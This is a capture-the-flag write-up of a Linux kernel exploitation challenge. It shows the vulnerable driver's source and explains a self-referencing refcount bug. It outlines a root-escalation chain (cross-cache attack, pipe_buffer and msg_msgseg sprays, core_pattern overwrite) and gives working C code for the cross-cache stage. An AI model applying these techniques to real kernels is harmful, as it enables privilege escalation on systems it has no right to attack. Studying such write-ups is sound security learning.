# Level 2 - not quite baby kernel (linux kernel pwn)

This was the most challenging of the 3 pwnables challenges, and I took about 2 weeks to solve it. It was especially hard given my lack of background in kernel pwn. Fortunately I eventually solved it (although not in the intended way :P)

Challenge files:

{% file src="<https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FFKVWJSS1JE6IHzjMdrNn%2Ffor_participant.zip?alt=media&token=b35fb88c-405d-4dcd-9548-399a446a6ef1>" %}

The challenge provides us with the following files:

```
- src
  - paradox.c
  - Makefile
- bzImage
- kernel_config_linux-6.12.38
- rootfs.cpio.gz
- start.sh  
```

Namely, `paradox.c` is the C code which implements the vulnerable linux driver, and the `Makefile` specifies how to compile it. `bzImage` is a compressed kernel image file, `kernel_config_linux-6.12.38` specifies all the config options of the linux kernel, `rootfs.cpio.gz` is the compressed filesystem, and `start.sh` runs the kernel.

Before delving into `paradox.c` let's cover some setup first:

We start by inspecting `start.sh` to understand the protections the kernel has:

```sh
#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 kaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm 
```

We can see that kaslr is enabled (which means that kernel functions are at a randomised address), and smap and smep are enabled. SMAP means that while in kernel mode, the CPU cannot access data in user pages, while SMEP means it cannot execute code in user pages.

To make it easier to debug, you should disable kaslr temporarily, and add `-s` to tell QEMU to open a GDB server on tcp port 1234, and `-no-reboot` and `-no-shutdown` so we can stop and see when a kernel crash occurs. Your `start.sh` will now look like this:

```sh
#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 nokaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm \
	-s \
	-no-reboot \
	-no-shutdown
```

To decompress `rootfs.cpio.gz` into an actual folder we can use the below `decompress.sh`:

```sh
#!/bin/sh

mkdir rootfs
cd rootfs
cp ../rootfs.cpio.gz .
gunzip ./rootfs.cpio.gz
cpio -idm < ./rootfs.cpio
rm rootfs.cpio
```

Now I prepare my workflow to compile exploit C code and re-compress the filesystem back into `rootfs.cpio.gz`, using `mycompress.sh` and `compress.sh`.

`mycompress.sh`:

```sh
gcc -O2 -lpthread -static src/solve.c -o src/solve 
mv src/solve rootfs/solve
./compress.sh
```

`compress.sh`:

```sh
cd rootfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > rootfs.cpio.gz
mv ./rootfs.cpio.gz ../

```

Now that the prep work is done, let's look at `paradox.c`:

{% code lineNumbers="true" %}

```c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/refcount.h>
#include <linux/cdev.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h> 

#define DEVICE_NAME "paradox_engine"

MODULE_LICENSE("GPL");


struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};

static struct kmem_cache *temporal_event_cache;

static void event_erase_from_reality(struct temporal_event *event);

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

static struct temporal_event* find_event_in_timeline(struct timeline *tl, u64 event_id) {
	struct temporal_event *ev;
	if (!tl) return NULL;
	list_for_each_entry(ev, &tl->events_head, timeline_node) {
		if (ev->event_id == event_id) return ev;
	}
	return NULL;
}

#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};
struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};

static int paradox_engine_open(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = kzalloc(sizeof(*session), GFP_KERNEL);
	if (!session) return -ENOMEM;

	mutex_init(&session->lock);

	INIT_LIST_HEAD(&session->all_timelines);
	atomic64_set(&session->next_timeline_id, 0);

	struct timeline *primordial_tl = kzalloc(sizeof(*primordial_tl), GFP_KERNEL);
	if (!primordial_tl) { kfree(session); return -ENOMEM; }
	primordial_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
	atomic64_set(&primordial_tl->next_event_id, 0);
	INIT_LIST_HEAD(&primordial_tl->events_head);
	list_add_tail(&primordial_tl->session_node, &session->all_timelines);

	struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
	if (!first_cause) { kfree(primordial_tl); kfree(session); return -ENOMEM; }
	first_cause->event_id = atomic64_fetch_add(1, &primordial_tl->next_event_id);
	refcount_set(&first_cause->causal_weight, 1);
	strcpy(first_cause->description, "The First Cause");
	first_cause->parent_timeline = primordial_tl;
	list_add_tail(&first_cause->timeline_node, &primordial_tl->events_head);

	filp->private_data = session;
	//printk(KERN_INFO "paradox_engine: New private universe created with Local Causality law.\n");
	return 0;
}

static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}

static long paradox_engine_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *target_tl = NULL, *tmp_tl;
	long ret = 0;

	mutex_lock(&session->lock);

	switch (cmd) {
		case PARADOX_CREATE_TIMELINE:
			{
				struct paradox_timeline_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				struct temporal_event *cause_event = NULL;
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if(tmp_tl->timeline_id == req.cause_timeline_id) {
						cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
						if(cause_event) break;
					}
				}
				if (!cause_event) { ret = -EINVAL; break; }
				struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
				if (!new_tl) { ret = -ENOMEM; break; }
				new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
				atomic64_set(&new_tl->next_event_id, 0);
				INIT_LIST_HEAD(&new_tl->events_head);
				new_tl->caused_by_event = cause_event;
				event_get(cause_event);
				list_add_tail(&new_tl->session_node, &session->all_timelines);
				req.new_timeline_id = new_tl->timeline_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}

		case PARADOX_CREATE_EVENT:
			{
				struct paradox_event_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
				}
				if (!target_tl) { ret = -EINVAL; break; }
				struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
				if (!event) { ret = -ENOMEM; break; }
				event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
				refcount_set(&event->causal_weight, 1);
				strncpy(event->description, req.description, sizeof(event->description) - 1);
				event->parent_timeline = target_tl;
				list_add_tail(&event->timeline_node, &target_tl->events_head);
				if (req.cause_event_id != 0) {
					struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
					if (cause_event) {
						event->causal_dependency = cause_event;
						event_get(cause_event);
					}
				}
				req.new_event_id = event->event_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}
		default:
			ret = -EINVAL;
	}

	mutex_unlock(&session->lock);
	return ret;
}

static const struct file_operations fops = {
	.owner = THIS_MODULE,
	.open = paradox_engine_open,
	.release = paradox_engine_release,
	.unlocked_ioctl = paradox_engine_ioctl,
};

static struct miscdevice dev;

static int dev_init(void) {
	dev.minor = MISC_DYNAMIC_MINOR;
	dev.name = DEVICE_NAME;
	dev.fops = &fops;
	dev.mode = 0644;
	temporal_event_cache = kmem_cache_create("temporal_event_cache",
			sizeof(struct temporal_event),
			0, SLAB_PANIC, NULL);
	if (!temporal_event_cache) {
		printk(KERN_ERR "paradox_engine: Failed to create slab cache.\n");
		return -ENOMEM;
	}

	if (misc_register(&dev)) {
		return -1;
	}


	return 0;
}

static void dev_cleanup(void) {
	misc_deregister(&dev);
}


module_init(dev_init);
module_exit(dev_cleanup);


```

{% endcode %}

To be honest, it's quite a lot of code, so let me summarise what's going on:

There are 3 main structs: `temporal_event`, `timeline` and `paradox_session_data`. They have the following structures:

```c
struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};
```

### paradox\_engine\_open

Each file descriptor that you open when you do `open("/dev/paradox_engine", O_RDONLY)` invokes `paradox_engine_open`, which instantiates the session by associating a `paradox_session_data` with it. We know this because it does&#x20;

```c
filp->private_data = session;
```

It also instantiates a `timeline` object and calls it the primordial timeline, and creates a `temporal_event` called the first cause. Each session has a list of all timelines, while each timeline has an event it is caused by and a list of events within that timeline.&#x20;

As for the temporal event, note the following:

{% code overflow="wrap" %}

```c
struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
```

{% endcode %}

The temporal event comes from its own dedicated cache. This will be important later.

Also note that this event has its refcount `causal_weight` set to 1.

### paradox\_engine\_ioctl

This function essentially specifies the ways in which a user can interact with the device. In particular, they can choose to either create a timeline or create an event.

#### Create timeline

Request structure:

```c
struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};
```

ioctl code:

```c
struct paradox_timeline_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
struct temporal_event *cause_event = NULL;
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if(tmp_tl->timeline_id == req.cause_timeline_id) {
		cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
		if(cause_event) break;
	}
}
if (!cause_event) { ret = -EINVAL; break; }
struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
if (!new_tl) { ret = -ENOMEM; break; }
new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
atomic64_set(&new_tl->next_event_id, 0);
INIT_LIST_HEAD(&new_tl->events_head);
new_tl->caused_by_event = cause_event;
event_get(cause_event);
list_add_tail(&new_tl->session_node, &session->all_timelines);
req.new_timeline_id = new_tl->timeline_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;
```

When creating a timeline, a user must specify the timeline and its event which caused this new timeline to occur. The timeline is created with the next id available, and it is added to the session. The event that caused this timeline gets `event_get` called on it, which basically increases the refcount `causal_weight`. If the request was successful, the new timeline's id is returned to the user.

#### Create event

Request structure:

```c
struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};
```

ioctl code:

```c
struct paradox_event_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
}
if (!target_tl) { ret = -EINVAL; break; }
struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
if (!event) { ret = -ENOMEM; break; }
event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
refcount_set(&event->causal_weight, 1);
strncpy(event->description, req.description, sizeof(event->description) - 1);
event->parent_timeline = target_tl;
list_add_tail(&event->timeline_node, &target_tl->events_head);
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}
req.new_event_id = event->event_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;
```

Once again the event is allocated from the `temporal_event_cache` and its data is zeroed. Its refcount is initialised to 1. The user's `description` is copied to the object, and the event that caused this event to happen has its refcount increased by 1. If `req.cause_event_id` is 0, however, that means that the new event isn't caused by another event. If the request is successful, the driver returns the event's id to the user.

### Looking for the vuln

For some background, refcount bugs are rather common, and are usually used to count how many times an object was referred to. When its refcount drops to 0 it is usually freed. This case is no different: When event\_put is called on an object and its refcount goes from 1 -> 0, the object is freed:

```c
static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
```

It actually took me some time (and gpting) to figure out the vuln, but eventually I realised a problem: When we create a temporal event, the event is added to its timeline BEFORE  we run the following `if` block:

```c
// event is added to the target timeline first!
list_add_tail(&event->timeline_node, &target_tl->events_head);
// THEN we find its cause event and set it as its causal dependency
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}
```

This results in it being possible for an event to have itself as its causal dependency.

### paradox\_engine\_release

Let's see the implication of this in `paradox_engine_release`, which is called when the driver is closed:

```c
static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}
```

It iterates through each timeline. Within each timeline it iterates through each event, and walks its `cause = event->causal_dependency`, calling `event_put` every time it finds a new `cause`. Once that's done, the pointer to its `causal_dependency` is zeroed, and the event itself has `event_put` called on it.

Then it iterates through each timeline in the session, calling `event_put` on the event which caused the timeline. Finally the timeline is freed.&#x20;

Thereafter, the session is freed.

### Implications

If an event has itself as a `causal_dependency`, what happens is that when we close the driver, the loop

```c
while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}
```

perpetually has the same event as its `cause`, and keeps calling `event_put` on it. Let's look at `event_put` again:

```c
static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
```

What this means is that whenever the refcount `causal_weight` hits 0 the event gets kfreed. What happens if it goes below 0 (which occurs when the self-referring event gets freed)? The kernel's `refcount_t` is designed to mitigate refcount bugs: on underflow it emits a warning and saturates the counter at `REFCOUNT_SATURATED` (`0xC0000000`), so the value gets stuck around `0xC0000000`/`0xBFFFFFFF`. It DOES NOT immediately lead to a double-free, and the kfree will still only occur once.

## :bug: More tips for debugging

Before exploitation, you may also find the following helpful to make debugging easier:

* Using the linux source code for linux 6.12.38 from <https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.12.38.tar.xz>, you should recompile the kernel with debugging symbols. Most CTF challenges (including this one) do not provide kernels with debugging symbols.
  * If you don't want to do this, you can also [use this tool](https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux) to convert the compressed bzImage into an uncompressed vmlinux, then [use this tool](https://github.com/marin-m/vmlinux-to-elf) to convert the vmlinux to an elf. This should be able to recover most symbols to make debugging easier. Then, to debug, do `gdb ./kernelelf` then `target remote :1234` when your kernel is running
* Use the [bata24 gef debugger](https://github.com/bata24/gef), it is ahead of pwndbg and the main gef fork. It comes with many features supporting kernel debugging. I found the commands `pagewalk-with-hints`, `slub-dump`, `xf` and `slab-contains` most helpful.
  * To easily find the victim object when debugging, all I needed to do was find its description using `xf "self-referring event"`

### Verifying trivial wins

Take note that there can actually be trivial leaks in kernel challenges via dmesg or kernel warnings or similar. However, in `init.sh` we see these two lines:

```shellscript
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 2 > /proc/sys/kernel/kptr_restrict
```

so trivial leaks are unfortunately out of the question.

I also tried to look for n-days in the given linux kernel itself, but unfortunately couldn't find any.

## Exploitation

Here are the high-level steps my exploit follows, which I will elaborate on later:

1. Perform a cross-cache attack on a self-referring event, ensuring that its page can get reclaimed by a CPU we control.
2. Spray `pipe_buffer` and reclaim the page with the page data of the `pipe_buffer`. Write bytes into all the `pipe_buffers` until we find which one's page reclaimed the victim, and the offset of the victim `temporal_event` in the page.
3. Spray ENLARGED `pipe_buffers` so that the `pipe_buffer` struct reclaims an order 9/10 page.
   1. Write 1 byte into each pipe fd then read 1 byte from it to fill the first pipe. Subsequent writes/splices will use the second pipe in the ring.
4. Reset the victim's refcount to `1`, and partially overwrite the victim's `temporal_event *` to point to the previously reclaimed order 9/10 page. The infinite loop causes that page to get kfreed.
5. Reclaim the previously order 9/10 page by spraying `msg_msgseg`. This "releases" the infinite loop and the CPU that was previously running the loop. We now have a `msg_msgseg` overlapping multiple `pipe_buffers`.
6. Call the `vmsplice` syscall to splice a vDSO memory page into the `pipe_buffers` from stage 3. This causes the second pipe in the UAF'd page to have its `struct page` address point to a page responsible for kernel text.
7. Read from `msg_msgseg` to leak the address of the `page *` for kernel text.
8. Prepare a fake pipe buffer with `page` and `offset` values calculated to point to the `core_pattern` `page`'s address, and set `PIPE_BUF_FLAG_CAN_MERGE` for the pipe flags.
9. Reclaim the previously freed `msg_msgseg` by spraying `msg_msgseg` again, overwriting the second `pipe_buffer` in the UAF'd page with the `page *` for `core_pattern`.
10. Write to the `pipe_buffer` to overwrite `core_pattern`, and trigger a crash to get a root shell.

### Part 1. Cross-cache attack

Remember how earlier we said that temporal events are allocated using a dedicated cache because we do this?:

{% code overflow="wrap" %}

```c
struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
```

{% endcode %}

This makes exploitation more difficult because when we free a `temporal_event` the page still belongs to `temporal_event_cache`. When we then allocate other objects, they use pages from different caches. i.e. they will not make use of the freed page (and thus not use our victim object!)

But there is a technique called cross-cache attack which allows us to still make this happen. The cross-cache attack allows the victim page to be reclaimed by any other object, reopening more exploitation techniques!

To perform this technique, I found [these black hat slides](https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf) particularly instructional. The gist of it is:

1. Pin task to a CPU
2. Drain partially free slabs
3. Allocate `objs_per_slab * (1 + cpu_partial)` objects (you can find these in `/sys/kernel/slab/temporal_event_cache/cpu_partial` and `/sys/kernel/slab/temporal_event_cache/objs_per_slab` )

```
/sys/kernel/slab/temporal_event_cache # cat cpu_partial
120
/sys/kernel/slab/temporal_event_cache # cat objs_per_slab
36
```

4. Allocate `objs_per_slab - 1` objects as pre-alloc objects
5. Allocate victim object
6. Allocate `objs_per_slab + 1` objects as post-alloc objects
7. Free victim, pre-alloc and post-alloc objects
8. Free one object per slab from step 2
   1. This triggers flushing of CPU partial list, allowing the victim slab to be released to the page allocator

At this point my code for the cross-cache attack looked something like this:

```c
#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120

...
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}
...
void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
pin_this_thread_to_cpu(0);
fd2 = open(DEVICE_PATH, O_RDONLY);
fd1 = open(DEVICE_PATH, O_RDONLY);
// getchar();
if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
printf("[+] devices opened\n");
printf("[*] creating events...\n");
// drain partially-free slabs
uint64_t partiallyfrees[CPU_PARTIAL + 1];
dev_create_timeline(fd2, 0, 0);
for (int i = 0; i < 34; i++) {
    uint64_t evt;
    evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    if (evt < 0) printf("[x] evt!");
}

for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % OBJS_PER_SLAB == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd2, 1, 0, "fd2event");
    }
    if (evt < 0) printf("[x] evt!");
}
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < CPU_PARTIAL + 1; i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt = dev_create_event(fd1, 1, 0, "pre-alloc object");
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[*] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);
printf("[*] Freeing self-referential event...\n");

pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt = dev_create_event(fd1, 1, 0, "post-alloc object");
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}
// sleep(0.01)
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);
...
```

Note that regardless of which fd you use to create events, they use the same cache and pages. Essentially the events created on fd2 would get freed first on cpu1 followed by the events created on fd1 which would get freed on cpu0.

&#x20;My intention was for the `(OBJS_PER_SLAB - 1) * (1 + CPU_PARTIAL)` objects and the `self-referring event` to be freed first on cpu1. Thereafter, the `pre-alloc` and `post-alloc` objects would be freed on cpu0.

This was a costly mistake, since freeing the self-referring event on cpu1 first causes the victim page to be on cpu1's per-cpu partial list, and cpu1 was the cpu with the infinite loop which I couldn't control.

:brain: The solution to this was quite simple: Instead of freeing the self-referring event first, free the pre-alloc and post-alloc objects first!

Here's the final working cross-cache code:

```c
void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
void *fillcpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
}
...
void *freecpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
}
...
pin_this_thread_to_cpu(0);
fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
// getchar();
printf("[+] devices opened\n");
printf("[+] creating events...\n");

// Fill (1 + CPU_PARTIAL) slabs on CPU 0, alternating owners: fd1 events are
// kept alive, fd3 events will presumably be freed later so each slab ends up
// only partially full — TODO confirm against where fd3 is closed.
// NOTE(review): partiallyfrees[i / OBJS_PER_SLAB] is overwritten on every
// even i within the same slab, so only the LAST even-index event of each
// slab is remembered.
uint64_t partiallyfrees[CPU_PARTIAL + 1];
for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % 2 == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
    }
    // NOTE(review): evt is uint64_t, so `evt < 0` is always false — error
    // returns from dev_create_event are silently missed here (the same
    // applies to the evt/tl checks further down).
    if (evt < 0) printf("[x] evt!");
}

// Run fillcpu1 on a separate thread so its allocations land on the other
// CPU's per-cpu slab lists (presumably pinned to CPU 1 inside fillcpu1).
pthread_t t1;
pthread_create(&t1, NULL, fillcpu1, NULL);
pthread_join(t1, NULL);
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

// Anchor one remembered event per slab as a timeline dependency, keeping
// each victim slab pinned in a partially-freed state.
for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

// The event whose causal_dependency points at itself: releasing it later
// underflows the refcount and drives the kfree loop in the driver's release.
printf("[+] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
// NOTE(review): %llu with uint64_t is not strictly portable; PRIu64 would be.
printf("[+] self-ref event created: e0=%llu\n", e0);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "post-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "post-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}

// Free fd5's half of the pre/post-alloc objects first so the victim slab
// lands on CPU 0's partial list (see the note after this listing).
close(fd5);
// pause();
pthread_t t2;
pthread_create(&t2, NULL, freecpu1, NULL);
pthread_join(t2, NULL);
printf("[+] Freeing self-referential event...\n");
pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);
// sleep(5); // bro...
// block until the other thread enters
// NOTE(review): sleep(1) is a race, not a synchronization primitive — it
// only makes it very likely that freefd2 has entered the release path.
sleep(1);
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);
```

